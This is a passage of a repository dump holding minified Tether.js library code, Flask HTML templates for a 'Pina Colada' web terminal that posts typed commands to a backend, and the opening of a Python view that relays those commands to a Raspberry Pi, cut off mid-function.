0===arguments[3]?!1:arguments[3];"undefined"==typeof this.bindings&&(this.bindings={}),"undefined"==typeof this.bindings[t]&&(this.bindings[t]=[]),this.bindings[t].push({handler:e,ctx:o,once:n})}},{key:"once",value:function(t,e,o){this.on(t,e,o,!0)}},{key:"off",value:function(t,e){if("undefined"!=typeof this.bindings&&"undefined"!=typeof this.bindings[t])if("undefined"==typeof e)delete this.bindings[t];else for(var o=0;o<this.bindings[t].length;)this.bindings[t][o].handler===e?this.bindings[t].splice(o,1):++o}},{key:"trigger",value:function(t){if("undefined"!=typeof this.bindings&&this.bindings[t]){for(var e=0,o=arguments.length,n=Array(o>1?o-1:0),i=1;o>i;i++)n[i-1]=arguments[i];for(;e<this.bindings[t].length;){var r=this.bindings[t][e],s=r.handler,a=r.ctx,f=r.once,l=a;"undefined"==typeof l&&(l=this),s.apply(l,n),f?this.bindings[t].splice(e,1):++e}}}}]),t}();x.Utils={getActualBoundingClientRect:i,getScrollParents:r,getBounds:a,getOffsetParent:f,extend:h,addClass:u,removeClass:d,hasClass:p,updateClasses:m,defer:k,flush:_,uniqueId:T,Evented:B,getScrollBarSize:l,removeUtilElements:s};var z=function(){function t(t,e){var o=[],n=!0,i=!1,r=void 0;try{for(var s,a=t[Symbol.iterator]();!(n=(s=a.next()).done)&&(o.push(s.value),!e||o.length!==e);n=!0);}catch(f){i=!0,r=f}finally{try{!n&&a["return"]&&a["return"]()}finally{if(i)throw r}}return o}return function(e,o){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return t(e,o);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),E=function(){function t(t,e){for(var o=0;o<e.length;o++){var n=e[o];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}return function(e,o,n){return o&&t(e.prototype,o),n&&t(e,n),e}}(),j=function(t,e,o){for(var n=!0;n;){var i=t,r=e,s=o;n=!1,null===i&&(i=Function.prototype);var a=Object.getOwnPropertyDescriptor(i,r);if(void 0!==a){if("value"in a)return a.value;var f=a.get;if(void 0===f)return;return f.call(s)}var l=Object.getPrototypeOf(i);if(null===l)return;t=l,e=r,o=s,n=!0,a=l=void 0}};if("undefined"==typeof x)throw new Error("You must include the utils.js file before tether.js");var Y=x.Utils,r=Y.getScrollParents,a=Y.getBounds,f=Y.getOffsetParent,h=Y.extend,u=Y.addClass,d=Y.removeClass,m=Y.updateClasses,k=Y.defer,_=Y.flush,l=Y.getScrollBarSize,s=Y.removeUtilElements,L=function(){if("undefined"==typeof document)return"";for(var t=document.createElement("div"),e=["transform","WebkitTransform","OTransform","MozTransform","msTransform"],o=0;o<e.length;++o){var n=e[o];if(void 0!==t.style[n])return n}}(),D=[],X=function(){D.forEach(function(t){t.position(!1)}),_()};!function(){var t=null,e=null,o=null,n=function i(){return"undefined"!=typeof e&&e>16?(e=Math.min(e-16,250),void(o=setTimeout(i,250))):void("undefined"!=typeof t&&b()-t<10||(null!=o&&(clearTimeout(o),o=null),t=b(),X(),e=b()-t))};"undefined"!=typeof window&&"undefined"!=typeof window.addEventListener&&["resize","scroll","touchmove"].forEach(function(t){window.addEventListener(t,n)})}();var F={center:"center",left:"right",right:"left"},H={middle:"middle",top:"bottom",bottom:"top"},N={top:0,left:0,middle:"50%",center:"50%",bottom:"100%",right:"100%"},U=function(t,e){var o=t.left,n=t.top;return"auto"===o&&(o=F[e.left]),"auto"===n&&(n=H[e.top]),{left:o,top:n}},V=function(t){var e=t.left,o=t.top;return"undefined"!=typeof N[t.left]&&(e=N[t.left]),"undefined"!=typeof N[t.top]&&(o=N[t.top]),{left:e,top:o}},R=function(t){var e=t.split(" "),o=z(e,2),n=o[0],i=o[1];return{top:n,left:i}},q=R,I=function(t){function e(t){var o=this;n(this,e),j(Object.getPrototypeOf(e.prototype),"constructor",this).call(this),this.position=this.position.bind(this),D.push(this),this.history=[],this.setOptions(t,!1),x.modules.forEach(function(t){"undefined"!=typeof t.initialize&&t.initialize.call(o)}),this.position()}return v(e,t),E(e,[{key:"getClass",value:function(){var t=arguments.length<=0||void 0===arguments[0]?"":arguments[0],e=this.options.classes;return"undefined"!=typeof e&&e[t]?this.options.classes[t]:this.options.classPrefix?this.options.classPrefix+"-"+t:t}},{key:"setOptions",value:function(t){var e=this,o=arguments.length<=1||void 0===arguments[1]?!0:arguments[1],n={offset:"0 0",targetOffset:"0 0",targetAttachment:"auto auto",classPrefix:"tether"};this.options=h(n,t);var i=this.options,s=i.element,a=i.target,f=i.targetModifier;if(this.element=s,this.target=a,this.targetModifier=f,"viewport"===this.target?(this.target=document.body,this.targetModifier="visible"):"scroll-handle"===this.target&&(this.target=document.body,this.targetModifier="scroll-handle"),["element","target"].forEach(function(t){if("undefined"==typeof e[t])throw new Error("Tether Error: Both element and target must be defined");"undefined"!=typeof e[t].jquery?e[t]=e[t][0]:"string"==typeof e[t]&&(e[t]=document.querySelector(e[t]))}),u(this.element,this.getClass("element")),this.options.addTargetClasses!==!1&&u(this.target,this.getClass("target")),!this.options.attachment)throw new Error("Tether Error: You must provide an attachment");this.targetAttachment=q(this.options.targetAttachment),this.attachment=q(this.options.attachment),this.offset=R(this.options.offset),this.targetOffset=R(this.options.targetOffset),"undefined"!=typeof this.scrollParents&&this.disable(),"scroll-handle"===this.targetModifier?this.scrollParents=[this.target]:this.scrollParents=r(this.target),this.options.enabled!==!1&&this.enable(o)}},{key:"getTargetBounds",value:function(){if("undefined"==typeof this.targetModifier)return a(this.target);if("visible"===this.targetModifier){if(this.target===document.body)return{top:pageYOffset,left:pageXOffset,height:innerHeight,width:innerWidth};var t=a(this.target),e={height:t.height,width:t.width,top:t.top,left:t.left};return e.height=Math.min(e.height,t.height-(pageYOffset-t.top)),e.height=Math.min(e.height,t.height-(t.top+t.height-(pageYOffset+innerHeight))),e.height=Math.min(innerHeight,e.height),e.height-=2,e.width=Math.min(e.width,t.width-(pageXOffset-t.left)),e.width=Math.min(e.width,t.width-(t.left+t.width-(pageXOffset+innerWidth))),e.width=Math.min(innerWidth,e.width),e.width-=2,e.top<pageYOffset&&(e.top=pageYOffset),e.left<pageXOffset&&(e.left=pageXOffset),e}if("scroll-handle"===this.targetModifier){var t=void 0,o=this.target;o===document.body?(o=document.documentElement,t={left:pageXOffset,top:pageYOffset,height:innerHeight,width:innerWidth}):t=a(o);var n=getComputedStyle(o),i=o.scrollWidth>o.clientWidth||[n.overflow,n.overflowX].indexOf("scroll")>=0||this.target!==document.body,r=0;i&&(r=15);var s=t.height-parseFloat(n.borderTopWidth)-parseFloat(n.borderBottomWidth)-r,e={width:15,height:.975*s*(s/o.scrollHeight),left:t.left+t.width-parseFloat(n.borderLeftWidth)-15},f=0;408>s&&this.target===document.body&&(f=-11e-5*Math.pow(s,2)-.00727*s+22.58),this.target!==document.body&&(e.height=Math.max(e.height,24));var l=this.target.scrollTop/(o.scrollHeight-s);return e.top=l*(s-e.height-f)+t.top+parseFloat(n.borderTopWidth),this.target===document.body&&(e.height=Math.max(e.height,24)),e}}},{key:"clearCache",value:function(){this._cache={}}},{key:"cache",value:function(t,e){return"undefined"==typeof this._cache&&(this._cache={}),"undefined"==typeof this._cache[t]&&(this._cache[t]=e.call(this)),this._cache[t]}},{key:"enable",value:function(){var t=this,e=arguments.length<=0||void 0===arguments[0]?!0:arguments[0];this.options.addTargetClasses!==!1&&u(this.target,this.getClass("enabled")),u(this.element,this.getClass("enabled")),this.enabled=!0,this.scrollParents.forEach(function(e){e!==t.target.ownerDocument&&e.addEventListener("scroll",t.position)}),e&&this.position()}},{key:"disable",value:function(){var t=this;d(this.target,this.getClass("enabled")),d(this.element,this.getClass("enabled")),this.enabled=!1,"undefined"!=typeof this.scrollParents&&this.scrollParents.forEach(function(e){e.removeEventListener("scroll",t.position)})}},{key:"destroy",value:function(){var t=this;this.disable(),D.forEach(function(e,o){e===t&&D.splice(o,1)}),0===D.length&&s()}},{key:"updateAttachClasses",value:function(t,e){var o=this;t=t||this.attachment,e=e||this.targetAttachment;var n=["left","top","bottom","right","middle","center"];"undefined"!=typeof this._addAttachClasses&&this._addAttachClasses.length&&this._addAttachClasses.splice(0,this._addAttachClasses.length),"undefined"==typeof this._addAttachClasses&&(this._addAttachClasses=[]);var i=this._addAttachClasses;t.top&&i.push(this.getClass("element-attached")+"-"+t.top),t.left&&i.push(this.getClass("element-attached")+"-"+t.left),e.top&&i.push(this.getClass("target-attached")+"-"+e.top),e.left&&i.push(this.getClass("target-attached")+"-"+e.left);var r=[];n.forEach(function(t){r.push(o.getClass("element-attached")+"-"+t),r.push(o.getClass("target-attached")+"-"+t)}),k(function(){"undefined"!=typeof o._addAttachClasses&&(m(o.element,o._addAttachClasses,r),o.options.addTargetClasses!==!1&&m(o.target,o._addAttachClasses,r),delete o._addAttachClasses)})}},{key:"position",value:function(){var t=this,e=arguments.length<=0||void 0===arguments[0]?!0:arguments[0];if(this.enabled){this.clearCache();var o=U(this.targetAttachment,this.attachment);this.updateAttachClasses(this.attachment,o);var n=this.cache("element-bounds",function(){return a(t.element)}),i=n.width,r=n.height;if(0===i&&0===r&&"undefined"!=typeof this.lastSize){var s=this.lastSize;i=s.width,r=s.height}else this.lastSize={width:i,height:r};var h=this.cache("target-bounds",function(){return t.getTargetBounds()}),d=h,u=C(V(this.attachment),{width:i,height:r}),p=C(V(o),d),c=C(this.offset,{width:i,height:r}),g=C(this.targetOffset,d);u=w(u,c),p=w(p,g);for(var m=h.left+p.left-u.left,v=h.top+p.top-u.top,y=0;y<x.modules.length;++y){var b=x.modules[y],O=b.position.call(this,{left:m,top:v,targetAttachment:o,targetPos:h,elementPos:n,offset:u,targetOffset:p,manualOffset:c,manualTargetOffset:g,scrollbarSize:S,attachment:this.attachment});if(O===!1)return!1;"undefined"!=typeof O&&"object"==typeof O&&(v=O.top,m=O.left)}var E={page:{top:v,left:m},viewport:{top:v-pageYOffset,bottom:pageYOffset-v-r+innerHeight,left:m-pageXOffset,right:pageXOffset-m-i+innerWidth}},A=this.target.ownerDocument,T=A.defaultView,S=void 0;return T.innerHeight>A.documentElement.clientHeight&&(S=this.cache("scrollbar-size",l),E.viewport.bottom-=S.height),T.innerWidth>A.documentElement.clientWidth&&(S=this.cache("scrollbar-size",l),E.viewport.right-=S.width),(-1===["","static"].indexOf(A.body.style.position)||-1===["","static"].indexOf(A.body.parentElement.style.position))&&(E.page.bottom=A.body.scrollHeight-v-r,E.page.right=A.body.scrollWidth-m-i),"undefined"!=typeof this.options.optimizations&&this.options.optimizations.moveElement!==!1&&"undefined"==typeof this.targetModifier&&!function(){var e=t.cache("target-offsetparent",function(){return f(t.target)}),o=t.cache("target-offsetparent-bounds",function(){return a(e)}),n=getComputedStyle(e),i=o,r={};if(["Top","Left","Bottom","Right"].forEach(function(t){r[t.toLowerCase()]=parseFloat(n["border"+t+"Width"])}),o.right=A.body.scrollWidth-o.left-i.width+r.right,o.bottom=A.body.scrollHeight-o.top-i.height+r.bottom,E.page.top>=o.top+r.top&&E.page.bottom>=o.bottom&&E.page.left>=o.left+r.left&&E.page.right>=o.right){var s=e.scrollTop,l=e.scrollLeft;E.offset={top:E.page.top-o.top+s-r.top,left:E.page.left-o.left+l-r.left}}}(),this.move(E),this.history.unshift(E),this.history.length>3&&this.history.pop(),e&&_(),!0}}},{key:"move",value:function(t){var e=this;if("undefined"!=typeof this.element.parentNode){var o={};for(var n in t){o[n]={};for(var i in t[n]){for(var r=!1,s=0;s<this.history.length;++s){var a=this.history[s];if("undefined"!=typeof a[n]&&!y(a[n][i],t[n][i])){r=!0;break}}r||(o[n][i]=!0)}}var l={top:"",left:"",right:"",bottom:""},d=function(t,o){var n="undefined"!=typeof e.options.optimizations,i=n?e.options.optimizations.gpu:null;if(i!==!1){var r=void 0,s=void 0;if(t.top?(l.top=0,r=o.top):(l.bottom=0,r=-o.bottom),t.left?(l.left=0,s=o.left):(l.right=0,s=-o.right),window.matchMedia){var a=window.matchMedia("only screen and (min-resolution: 1.3dppx)").matches||window.matchMedia("only screen and (-webkit-min-device-pixel-ratio: 1.3)").matches;a||(s=Math.round(s),r=Math.round(r))}l[L]="translateX("+s+"px) translateY("+r+"px)","msTransform"!==L&&(l[L]+=" translateZ(0)")}else t.top?l.top=o.top+"px":l.bottom=o.bottom+"px",t.left?l.left=o.left+"px":l.right=o.right+"px"},u=!1;if((o.page.top||o.page.bottom)&&(o.page.left||o.page.right)?(l.position="absolute",d(o.page,t.page)):(o.viewport.top||o.viewport.bottom)&&(o.viewport.left||o.viewport.right)?(l.position="fixed",d(o.viewport,t.viewport)):"undefined"!=typeof o.offset&&o.offset.top&&o.offset.left?!function(){l.position="absolute";var n=e.cache("target-offsetparent",function(){return f(e.target)});f(e.element)!==n&&k(function(){e.element.parentNode.removeChild(e.element),n.appendChild(e.element)}),d(o.offset,t.offset),u=!0}():(l.position="absolute",d({top:!0,left:!0},t.page)),!u){for(var p=!0,c=this.element.parentNode;c&&1===c.nodeType&&"BODY"!==c.tagName;){if("static"!==getComputedStyle(c).position){p=!1;break}c=c.parentNode}p||(this.element.parentNode.removeChild(this.element),this.element.ownerDocument.body.appendChild(this.element))}var g={},m=!1;for(var i in l){var v=l[i],b=this.element.style[i];b!==v&&(m=!0,g[i]=v)}m&&k(function(){h(e.element.style,g),e.trigger("repositioned")})}}}]),e}(B);I.modules=[],x.position=X;var $=h(I,x),z=function(){function t(t,e){var o=[],n=!0,i=!1,r=void 0;try{for(var s,a=t[Symbol.iterator]();!(n=(s=a.next()).done)&&(o.push(s.value),!e||o.length!==e);n=!0);}catch(f){i=!0,r=f}finally{try{!n&&a["return"]&&a["return"]()}finally{if(i)throw r}}return o}return function(e,o){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return t(e,o);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),Y=x.Utils,a=Y.getBounds,h=Y.extend,m=Y.updateClasses,k=Y.defer,G=["left","top","right","bottom"];x.modules.push({position:function(t){var e=this,o=t.top,n=t.left,i=t.targetAttachment;if(!this.options.constraints)return!0;var r=this.cache("element-bounds",function(){return a(e.element)}),s=r.height,f=r.width;if(0===f&&0===s&&"undefined"!=typeof this.lastSize){var l=this.lastSize;f=l.width,s=l.height}var d=this.cache("target-bounds",function(){return e.getTargetBounds()}),u=d.height,p=d.width,c=[this.getClass("pinned"),this.getClass("out-of-bounds")];this.options.constraints.forEach(function(t){var e=t.outOfBoundsClass,o=t.pinnedClass;e&&c.push(e),o&&c.push(o)}),c.forEach(function(t){["left","top","right","bottom"].forEach(function(e){c.push(t+"-"+e)})});var g=[],v=h({},i),y=h({},this.attachment);return this.options.constraints.forEach(function(t){var r=t.to,a=t.attachment,l=t.pin;"undefined"==typeof a&&(a="");var h=void 0,d=void 0;if(a.indexOf(" ")>=0){var c=a.split(" "),m=z(c,2);d=m[0],h=m[1]}else h=d=a;var b=O(e,r);("target"===d||"both"===d)&&(o<b[1]&&"top"===v.top&&(o+=u,v.top="bottom"),o+s>b[3]&&"bottom"===v.top&&(o-=u,v.top="top")),"together"===d&&("top"===v.top&&("bottom"===y.top&&o<b[1]?(o+=u,v.top="bottom",o+=s,y.top="top"):"top"===y.top&&o+s>b[3]&&o-(s-u)>=b[1]&&(o-=s-u,v.top="bottom",y.top="bottom")),"bottom"===v.top&&("top"===y.top&&o+s>b[3]?(o-=u,v.top="top",o-=s,y.top="bottom"):"bottom"===y.top&&o<b[1]&&o+(2*s-u)<=b[3]&&(o+=s-u,v.top="top",y.top="top")),"middle"===v.top&&(o+s>b[3]&&"top"===y.top?(o-=s,y.top="bottom"):o<b[1]&&"bottom"===y.top&&(o+=s,y.top="top"))),("target"===h||"both"===h)&&(n<b[0]&&"left"===v.left&&(n+=p,v.left="right"),n+f>b[2]&&"right"===v.left&&(n-=p,v.left="left")),"together"===h&&(n<b[0]&&"left"===v.left?"right"===y.left?(n+=p,v.left="right",n+=f,y.left="left"):"left"===y.left&&(n+=p,v.left="right",n-=f,y.left="right"):n+f>b[2]&&"right"===v.left?"left"===y.left?(n-=p,v.left="left",n-=f,y.left="right"):"right"===y.left&&(n-=p,v.left="left",n+=f,y.left="left"):"center"===v.left&&(n+f>b[2]&&"left"===y.left?(n-=f,y.left="right"):n<b[0]&&"right"===y.left&&(n+=f,y.left="left"))),("element"===d||"both"===d)&&(o<b[1]&&"bottom"===y.top&&(o+=s,y.top="top"),o+s>b[3]&&"top"===y.top&&(o-=s,y.top="bottom")),("element"===h||"both"===h)&&(n<b[0]&&("right"===y.left?(n+=f,y.left="left"):"center"===y.left&&(n+=f/2,y.left="left")),n+f>b[2]&&("left"===y.left?(n-=f,y.left="right"):"center"===y.left&&(n-=f/2,y.left="right"))),"string"==typeof l?l=l.split(",").map(function(t){return t.trim()}):l===!0&&(l=["top","left","right","bottom"]),l=l||[];var w=[],C=[];o<b[1]&&(l.indexOf("top")>=0?(o=b[1],w.push("top")):C.push("top")),o+s>b[3]&&(l.indexOf("bottom")>=0?(o=b[3]-s,w.push("bottom")):C.push("bottom")),n<b[0]&&(l.indexOf("left")>=0?(n=b[0],w.push("left")):C.push("left")),n+f>b[2]&&(l.indexOf("right")>=0?(n=b[2]-f,w.push("right")):C.push("right")),w.length&&!function(){var t=void 0;t="undefined"!=typeof e.options.pinnedClass?e.options.pinnedClass:e.getClass("pinned"),g.push(t),w.forEach(function(e){g.push(t+"-"+e)})}(),C.length&&!function(){var t=void 0;t="undefined"!=typeof e.options.outOfBoundsClass?e.options.outOfBoundsClass:e.getClass("out-of-bounds"),g.push(t),C.forEach(function(e){g.push(t+"-"+e)})}(),(w.indexOf("left")>=0||w.indexOf("right")>=0)&&(y.left=v.left=!1),(w.indexOf("top")>=0||w.indexOf("bottom")>=0)&&(y.top=v.top=!1),(v.top!==i.top||v.left!==i.left||y.top!==e.attachment.top||y.left!==e.attachment.left)&&(e.updateAttachClasses(y,v),e.trigger("update",{attachment:y,targetAttachment:v}))}),k(function(){e.options.addTargetClasses!==!1&&m(e.target,g,c),m(e.element,g,c)}),{top:o,left:n}}});var Y=x.Utils,a=Y.getBounds,m=Y.updateClasses,k=Y.defer;x.modules.push({position:function(t){var e=this,o=t.top,n=t.left,i=this.cache("element-bounds",function(){return a(e.element)}),r=i.height,s=i.width,f=this.getTargetBounds(),l=o+r,h=n+s,d=[];o<=f.bottom&&l>=f.top&&["left","right"].forEach(function(t){var e=f[t];(e===n||e===h)&&d.push(t)}),n<=f.right&&h>=f.left&&["top","bottom"].forEach(function(t){var e=f[t];(e===o||e===l)&&d.push(t)});var u=[],p=[],c=["left","top","right","bottom"];return u.push(this.getClass("abutted")),c.forEach(function(t){u.push(e.getClass("abutted")+"-"+t)}),d.length&&p.push(this.getClass("abutted")),d.forEach(function(t){p.push(e.getClass("abutted")+"-"+t)}),k(function(){e.options.addTargetClasses!==!1&&m(e.target,p,u),m(e.element,p,u)}),!0}});var z=function(){function t(t,e){var o=[],n=!0,i=!1,r=void 0;try{for(var s,a=t[Symbol.iterator]();!(n=(s=a.next()).done)&&(o.push(s.value),!e||o.length!==e);n=!0);}catch(f){i=!0,r=f}finally{try{!n&&a["return"]&&a["return"]()}finally{if(i)throw r}}return o}return function(e,o){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return t(e,o);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}();return x.modules.push({position:function(t){var e=t.top,o=t.left;if(this.options.shift){var n=this.options.shift;"function"==typeof this.options.shift&&(n=this.options.shift.call(this,{top:e,left:o}));var i=void 0,r=void 0;if("string"==typeof n){n=n.split(" "),n[1]=n[1]||n[0];var s=n,a=z(s,2);i=a[0],r=a[1],i=parseFloat(i,10),r=parseFloat(r,10)}else i=n.top,r=n.left;return e+=i,o+=r,{top:e,left:o}}}}),$});


--------------------------------------------------------------------------------
/pinacolada_website/templates/404.html:
--------------------------------------------------------------------------------
 1 | <!doctype html>
 2 | <title>Chapter 404: The Lost Page</title>
 3 | <style type=text/css>
 4 | body, html {
 5 |   height: 100%;
 6 |   margin: 0;
 7 |   padding: 0;
 8 | }
 9 | 
10 | body {
11 |   background: url({{ url_for('static', filename='ship.png') }}) no-repeat center right;
12 | }
13 | 
14 | body:after {
15 |   content: "";
16 |   display: block;
17 |   position: absolute;
18 |   top: 0;
19 |   bottom: 0;
20 |   width: 30px;
21 |   background: url({{ url_for('static', filename='mask.png') }}) repeat-y left;
22 | }
23 | 
24 | a { color: #004B6B; }
25 | a:hover { color: #6D4100; }
26 | 
27 | h1 {
28 |   font-family: 'Garamond', 'Georgia', serif;
29 |   font-weight: normal;
30 |   color: #222;
31 |   font-size: 36px;
32 |   padding: 50px 0 10px 50px;
33 |   margin: 0;
34 | }
35 | 
36 | p {
37 |   font-family: 'Georgia', serif;
38 |   color: #000;
39 |   font-size: 17px;
40 |   padding: 10px 0 0 90px;
41 |   margin: 0;
42 |   width: 360px;
43 | }
44 | </style>
45 | <h1>Chapter 404: The Lost Page</h1>
46 | <p>A careful and diligent search has been made for the desired page, but it just cannot be found.
47 | <p>And so they returned to <a href=/>familiar waters</a>.
48 | 


--------------------------------------------------------------------------------
/pinacolada_website/templates/index/command.html:
--------------------------------------------------------------------------------
1 | <html>
2 | </html>


--------------------------------------------------------------------------------
/pinacolada_website/templates/index/index.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 |   <head>
  4 |     <meta charset="utf-8">
  5 |     <meta http-equiv="X-UA-Compatible" content="IE=edge">
  6 |     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  7 |     <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
  8 |     <meta name="description" content="">
  9 |     <meta name="author" content="">
 10 |     <link rel="icon" href="../../favicon.ico">
 11 | 
 12 |     <script
 13 |       src="https://code.jquery.com/jquery-2.2.4.min.js"
 14 |       integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44="
 15 |       crossorigin="anonymous"></script>
 16 |     <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.terminal/0.11.18/js/jquery.terminal.min.js"></script>
 17 | 
 18 |     <link href="https://cdnjs.cloudflare.com/ajax/libs/jquery.terminal/0.11.18/css/jquery.terminal.min.css" rel="stylesheet"/>
 19 | 
 20 |     <title>Cover Template for Bootstrap</title>
 21 | 
 22 |     <!-- Bootstrap core CSS -->
 23 |     <link href="../../static/bootstrap.min.css" rel="stylesheet">
 24 | 
 25 |     <!-- Custom styles for this template -->
 26 |     <link href="../../static/cover.css" rel="stylesheet">
 27 |   </head>
 28 |   <style>
 29 |   body {
 30 |     background: linear-gradient( rgba(0, 0, 0, 0.7), rgba(0, 0, 0, 0.7) ), url('../../static/background.gif');
 31 |     background-repeat: no-repeat;
 32 |     background-size: cover;
 33 |   }
 34 |   @keyframes blink {
 35 |     0% { opacity: 1; }
 36 |     25% { opacity: 0; }
 37 |     50% { opacity: 0; }
 38 |     100% { opacity: 1; }
 39 | }
 40 | @-webkit-keyframes blink {
 41 |     0% { opacity: 1; }
 42 |     25% { opacity: 0; }
 43 |     50% { opacity: 0; }
 44 |     100% { opacity: 1; }
 45 | }
 46 | @-ms-keyframes blink {
 47 |     0% { opacity: 1; }
 48 |     25% { opacity: 0; }
 49 |     50% { opacity: 0; }
 50 |     100% { opacity: 1; }
 51 | }
 52 | @-moz-keyframes blink {
 53 |     0% { opacity: 1; }
 54 |     25% { opacity: 0; }
 55 |     50% { opacity: 0; }
 56 |     100% { opacity: 1; }
 57 | }
 58 | .cmd .cursor.blink {
 59 |     background: #aaa;
 60 |     -webkit-animation: blink 1s infinite linear;
 61 |        -moz-animation: blink 1s infinite linear;
 62 |         -ms-animation: blink 1s infinite linear;
 63 |             animation: blink 1s linear infinite;
 64 |     -webkit-box-shadow: 0 0 5px rgba(0,100,0,50);
 65 |        -moz-box-shadow: 0 0 5px rgba(0,100,0,50);
 66 |         -ms-box-shadow: 0 0 5px rgba(0,100,0,50);
 67 |          -o-box-shadow: 0 0 5px rgba(0,100,0,50);
 68 |             box-shadow: 0 0 5px rgba(0,100,0,50);
 69 | }
 70 |   pre {
 71 |     color: #aaa;
 72 |     font-family: Monaco;
 73 |     font-size: 12px;
 74 |   }
 75 |   .prompt {
 76 |   color: blue;
 77 |   }
 78 |   .cmd {
 79 |   font-family: Monaco;
 80 |   }
 81 |   </style>
 82 |   <body>
 83 | 
 84 |     <div class="site-wrapper">
 85 | 
 86 |       <div class="site-wrapper-inner">
 87 | 
 88 |         <div class="cover-container">
 89 | 
 90 |           <div class="masthead clearfix">
 91 |             <div class="inner">
 92 |               <h3 class="masthead-brand">Pi&ntildea Colada</h3>
 93 |               <nav class="nav nav-masthead">
 94 |                 <a class="nav-link active" href="#">Home</a>
 95 |               </nav>
 96 |             </div>
 97 |           </div>
 98 | 
 99 |           <div class="inner cover">
100 |             <h1 class="cover-heading"></h1>
101 | 
102 | 
103 |         </div>
104 | 
105 |       </div>
106 |         <center>
107 |         <div id="pinacolada_cli" style="text-align:left; border: 1px solid #aaa; border-radius:5px;font-family: Monaco"></div>
108 |         </center>
109 |           <script>
110 |               $('#pinacolada_cli').terminal(function(command, term) {
111 |                       console.log(command);
112 |                   $.ajax({
113 |                       type: "POST",
114 |                       url : '/command/',
115 |                       data : {
116 |                           'command' : command
117 |                       },
118 |                       success : function(data) {
119 |                           term.echo(data["response"],{raw:true});
120 |                           term.set_prompt(data["prompt"], {raw: true});
121 |                       },
122 |                   });}
123 |                   , {
124 |                   greetings: {{ greetings|tojson|safe}},
125 |                   name: 'PinaColada CLI',
126 |                   height: 400,
127 |                   width: 900,
128 |                   prompt: '>> '
129 |               });
130 |               </script>
131 |          </div>
132 | 
133 |     </div>
134 | 
135 |     <!-- Bootstrap core JavaScript
136 |     ================================================== -->
137 |     <!-- Placed at the end of the document so the pages load faster -->
138 |     <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.0.0/jquery.min.js" integrity="sha384-THPy051/pYDQGanwU6poAc/hOdQxjnOEXzbT+OuUAFqNqFjL+4IGLBgCJC3ZOShY" crossorigin="anonymous"></script>
139 |     <script>window.jQuery || document.write('<script src="../../assets/js/vendor/jquery.min.js"><\/script>')</script>
140 |     <script src="../../static/tether.min.js" integrity="sha384-Plbmg8JY28KFelvJVai01l8WyZzrYWG825m+cZ0eDDS1f7d/js6ikvy1+X+guPIB" crossorigin="anonymous"></script>
141 |     <script src="../../static/bootstrap.min.js"></script>
142 |     <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
143 |     <script src="../../assets/js/ie10-viewport-bug-workaround.js"></script>
144 |   </body>
145 | </html>
146 | 


--------------------------------------------------------------------------------
/pinacolada_website/templates/index/terminal.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | <script
 4 |   src="https://code.jquery.com/jquery-2.2.4.min.js"
 5 |   integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44="
 6 |   crossorigin="anonymous"></script>
 7 | <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.terminal/0.11.18/js/jquery.terminal.min.js"></script>
 8 | 
 9 | <link href="https://cdnjs.cloudflare.com/ajax/libs/jquery.terminal/0.11.18/css/jquery.terminal.min.css" rel="stylesheet"/>
10 | </head>
11 | <body>
12 | <div id="pinacolada_cli">
13 | <script>
14 |     $('#pinacolada_cli').terminal(function(command, term) {
15 |             console.log(command);
16 |         $.ajax({
17 |             type: "POST",
18 |             url : '/command/',
19 |             data : {
20 |                 'command' : command
21 |             },
22 |             success : function(data) {              
23 |                 term.echo(data);
24 |             },
25 |         });}
26 |         , {
27 |         greetings: {{ greetings |tojson|safe}},
28 |         name: 'PinaColada CLI',
29 |         height: 600,
30 |         width: 900,
31 |         prompt: '>> '
32 |     });
33 | </script>
34 | </div>
35 | </body>
36 | </html>


--------------------------------------------------------------------------------
/pinacolada_website/views/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ecthros/pina-colada/672ca4e3c01644dd611664ddf7474efa9dc2bc57/pinacolada_website/views/__init__.py


--------------------------------------------------------------------------------
/pinacolada_website/views/index.py:
--------------------------------------------------------------------------------
 1 | from flask import current_app, Blueprint, render_template, session, redirect, url_for, \
 2 |      request, flash, g, jsonify, abort
 3 | import re
 4 | from ansi2html import Ansi2HTMLConverter
 5 | 
 6 | conv = Ansi2HTMLConverter()
 7 | ansi_escape = re.compile(r'\x1b[^m]*m')
 8 | mod = Blueprint('index', __name__)
 9 | cli_init = False
10 | CLI_INIT = 10
11 | CLI = 11
12 | CLI_RESP = 12
13 | 
14 | @mod.route('/')
15 | def index():
16 |     s = current_app.config["server"]
17 |     print " + Sending command to pi..."
18 |     s.send_to_pi(CLI_INIT, "0", "cli init")
19 |     s.pi_resp_event.wait()
20 |     s.pi_resp_event.clear()
21 |     resp = ansi_escape.sub('', "\n".join(s.pi_resp.rstrip().split("\n")[:-1]))  # strip prompt and ansi
22 |     return render_template('index/index.html', greetings=resp)
23 | 
24 | '''
25 | @mod.route('/terminal/')
26 | def terminal():
27 |     s = current_app.config["server"]
28 |     print " + Sending command to pi..."
29 |     s.send_to_pi(CLI_INIT, "0", "cli init")
30 |     s.pi_resp_event.wait()
31 |     s.pi_resp_event.clear()
32 |     #resp = ansi_escape.sub('', s.pi_resp)
33 |     prompt = s.pi_resp.split("\n")[-1]
34 |     print "I THINK THE PROMPT IS %s " % prompt
35 |     resp = conv.convert("\n".join(s.pi_resp.rstrip().split("\n")[:-1]))
36 |     return render_template('index/terminal.html', greetings=resp)
37 | '''
38 | 
39 | @mod.route('/command/', methods=['POST'])
40 | def post():
41 |     data = {}
42 |     command = request.form['command']
